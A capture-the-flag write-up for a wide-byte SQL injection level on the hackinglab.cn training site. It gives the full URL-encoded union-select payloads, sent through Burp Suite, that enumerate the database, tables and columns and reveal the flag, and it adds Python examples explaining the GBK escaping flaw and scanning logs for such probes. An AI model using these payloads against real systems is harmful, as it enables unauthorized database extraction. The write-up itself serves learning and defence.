
hackinglab.cn series -> Injection levels: Encounter (邂逅)

Today I reached injection level 5 and was stuck for a long time. After searching online I found that the injection point is not at http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/?id=1 but in an image link, http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg, and that it is a wide-byte injection.

Notes:

1. Injecting directly in the browser only shows a broken image as the response; do the injection in Burp Suite.

2. When injecting in Burp Suite, URL-encode the payload, e.g. a space is written as %20.
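The writeup calls this a wide-byte injection but does not explain why the %df%27 prefix matters. The following is an added example, not code from the writeup or from the lab: it mimics a byte-wise escaper in the style of PHP addslashes(), shows what a GBK-configured database sees after that escaping, and contrasts it with escaping done at the character level (decode first, then escape), which rejects the malformed byte sequence. The function names and the sample inputs are my own; bound parameters remain the real fix, since then the value never becomes part of the SQL text at all.

```python
# Added example (not from the original writeup): why a lead byte such as 0xDF
# placed before a quote defeats byte-wise quote escaping when the database
# connection uses GBK, and how character-aware escaping avoids it.

BACKSLASH = 0x5C


def naive_escape(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP addslashes(): it knows nothing
    about the charset, so it just inserts a backslash byte before ' " \\ NUL."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(BACKSLASH)
        out.append(b)
    return bytes(out)


def gbk_view(escaped: bytes) -> str:
    """How a server whose connection charset is GBK interprets the bytes.
    0xDF 0x5C is a valid two-byte GBK character, so the inserted backslash
    is swallowed into it and the quote that follows is left unescaped."""
    return escaped.decode("gbk", errors="replace")


def has_unescaped_quote(text: str) -> bool:
    """True if the decoded text contains a single quote not preceded by a backslash."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def is_well_formed(raw: bytes, charset: str = "gbk") -> bool:
    """Strict decode: a lone lead byte followed by 0x27 is not valid GBK
    (trail bytes start at 0x40), so such input is rejected up front."""
    try:
        raw.decode(charset)
        return True
    except UnicodeDecodeError:
        return False


def charset_aware_escape(raw: bytes, charset: str = "gbk") -> bytes:
    """Decode strictly, escape on characters, re-encode. Malformed input
    raises instead of being silently reinterpreted by the database."""
    text = raw.decode(charset)  # raises UnicodeDecodeError on malformed bytes
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return escaped.encode(charset)


if __name__ == "__main__":
    # Constructed inputs: the wide-byte probe from the writeup, a plain ASCII
    # quote, and a legitimate GBK string that happens to contain a quote.
    probe = b"\xdf\x27"
    legit = "運'".encode("gbk")
    for label, raw in (("probe", probe), ("ascii", b"a'b"), ("legit", legit)):
        seen = gbk_view(naive_escape(raw))
        print(f"{label:6} naive  -> {seen!r:12} unescaped quote: {has_unescaped_quote(seen)}")
        if is_well_formed(raw):
            seen = gbk_view(charset_aware_escape(raw))
            print(f"{label:6} aware  -> {seen!r:12} unescaped quote: {has_unescaped_quote(seen)}")
        else:
            print(f"{label:6} aware  -> rejected as malformed GBK")
```

The naive path turns the probe into 0xDF 0x5C 0x27, which GBK reads as one CJK character followed by a bare quote; the character-aware path refuses the probe because 0xDF 0x27 is not a GBK sequence, and still escapes the legitimate multibyte string correctly.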

Walkthrough:

1. Dump the current database name:

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1

Result: mydbs

2. Dump the table names:

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x6d79646273%20limit%200,1),4%23 HTTP/1.1

Result: article

Dumping the second table the same way gives pic (the flag is in this table).

3. Get all column names of the pic table:

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_name=0x706963%20limit%200,1),4%23 HTTP/1.1

Result: id

The same way yields picname, data, text.

4. Get the data in the picname column:

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20picname%20from%20pic%20limit%202,1),4%23

The output is an image name, not the flag...

5. Visit the image:

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg

getflag!

===================================

This level was really hard work; who hides the injection point in an image...
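From the defender's side, the lesson of this level is that an injection point can sit behind a URL that looks like a static asset. The following is an added example, not part of the writeup: a small scanner over constructed access-log lines in the common combined format that flags a query string on an image path, SQL keywords after URL decoding, and a high (multibyte lead) byte immediately before a quote, the signature of the wide-byte probe. The log lines, client addresses and timestamps are constructed; the request paths reuse the lab URL from the writeup.

```python
# Added example (not from the original writeup): detection of SQL injection
# probes hidden behind static-asset URLs, run over constructed log lines.
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Common/combined log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

STATIC_EXT = (".jpg", ".jpeg", ".png", ".gif", ".css", ".js")

# Keywords that rarely belong in a parameter of an image request.
SQL_MARKERS = re.compile(rb"(?i)\b(union|select|information_schema|database\s*\()")

# A GBK/Big5-style lead byte (0x81-0xFE) directly followed by a quote or
# backslash: what %df%27 looks like once the query string is URL-decoded.
WIDE_BYTE = re.compile(rb"[\x81-\xfe]['\"\\]")

# Constructed sample log (not real traffic); paths reuse the lab URL from the writeup.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2016:10:01:02 +0800] "GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2016:10:01:09 +0800] "GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2016:10:02:31 +0800] "GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1" 200 0',
    '10.0.0.7 - - [12/Mar/2016:10:03:00 +0800] "GET /index.php?id=1 HTTP/1.1" 200 812',
]


def suspicious_request(target: str) -> list:
    """Return the list of reasons a request target looks like an injection probe."""
    reasons = []
    parts = urlsplit(target)
    if parts.path.lower().endswith(STATIC_EXT) and parts.query:
        reasons.append("query string on static asset")
    decoded = unquote_to_bytes(parts.query)  # bytes: keep non-UTF-8 payloads intact
    if SQL_MARKERS.search(decoded):
        reasons.append("sql keyword in query")
    if WIDE_BYTE.search(decoded):
        reasons.append("high byte before quote (wide-byte pattern)")
    return reasons


def scan(lines) -> list:
    """Parse each log line and collect (client, target, reasons) for flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        client, _method, target, _status, _size = m.groups()
        reasons = suspicious_request(target)
        if reasons:
            hits.append((client, target, reasons))
    return hits


if __name__ == "__main__":
    for client, target, reasons in scan(SAMPLE_LOG):
        print(client, target[:60] + ("..." if len(target) > 60 else ""))
        for r in reasons:
            print("   -", r)
```

A lone "query string on static asset" hit is a low-confidence signal (cache-busting parameters look the same); the combination with a decoded SQL keyword or the high-byte-before-quote pattern is what should page someone.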
